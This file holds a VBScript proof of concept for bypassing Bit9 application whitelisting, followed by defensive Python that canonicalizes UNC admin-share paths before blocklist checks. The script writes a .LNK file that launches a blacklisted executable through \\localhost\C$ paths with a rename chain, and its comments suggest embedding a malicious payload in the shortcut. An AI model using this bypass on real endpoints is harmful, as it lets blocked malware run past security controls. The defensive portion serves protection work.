' Reported a bug in Bit9 whitelisting soln, where
' A blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other
' UNC equivalent path.
' Attack vector could be .LNK or .PS1 file. I prefer .Lnk since it is rarely blacklisted.
' The VBS script below generates a POC .LNK file that exploits that.
' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.
' https://twitter.com/waleedassar
set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut("B.Lnk")
oShellLink.TargetPath = "Cmd.exe"
oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
oShellLink.WindowStyle = 1
oShellLink.IconLocation = "notepad.exe, 0"
oShellLink.Description = "Bit9 Bypass"
oShellLink.Save
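The defensive counterpart to the equivalence gap described in the comments above, added here and not part of the original paste or of Bit9: a path canonicalizer that folds UNC administrative-share spellings of a local file (\\localhost\C$\..., \\127.0.0.1\C$\..., the machine's own name, and \\.\C:\ device paths) back to the plain drive path before a block or allow rule is compared. The set of local host names and the blocklist entries are constructed assumptions.

```python
import re
import ntpath

# Constructed assumption: names that resolve to the local machine. "." and "?"
# cover the \\.\C:\ and \\?\C:\ Win32 device/verbatim prefixes, not real hosts.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1", ".", "?"}

# \\host\C$\rest (admin share) or \\host\C:\rest (device path), case-insensitive
_ADMIN_SHARE = re.compile(r"^\\\\([^\\]+)\\([a-z])[$:](?:\\(.*))?$", re.IGNORECASE)


def canonicalize(path: str, local_hosts=LOCAL_HOSTS, this_host: str = "") -> str:
    """Return one canonical spelling for a local file path.

    UNC admin-share forms that provably point at this machine are rewritten to
    the drive path; anything else is normalized (dot segments, repeated
    separators, case) but left as-is so a policy engine can still treat it as
    a remote or unknown origin rather than silently trusting it.
    """
    p = path.strip().strip('"').replace("/", "\\")
    m = _ADMIN_SHARE.match(p)
    if m:
        host, drive, rest = m.group(1), m.group(2), m.group(3) or ""
        if host.lower() in local_hosts or (this_host and host.lower() == this_host.lower()):
            p = f"{drive}:\\{rest}"
    # ntpath.normpath collapses '.', '..' and doubled separators; NTFS paths are
    # case-insensitive, so lower-case for comparison.
    return ntpath.normpath(p).lower()


def is_blocked(path: str, blocklist, **kw) -> bool:
    """Compare the canonical form of `path` against a canonicalized blocklist."""
    canon = canonicalize(path, **kw)
    return any(canon == canonicalize(entry, **kw) for entry in blocklist)


if __name__ == "__main__":
    rule = [r"C:\test\test.exe"]  # constructed blocklist entry
    for candidate in (r"C:\test\test.exe", r"\\localhost\C$\test\test.exe",
                      r"\\127.0.0.1\C$\test\..\test\test.exe", r"\\fileserver\C$\test\test.exe"):
        print(f"{candidate:45} blocked={is_blocked(candidate, rule)}")
```

String canonicalization only closes spelling variants of the same path; a control keyed on the file's hash or object identity rather than its path is the more robust fix, since the paste's rename chain changes the name but not the binary.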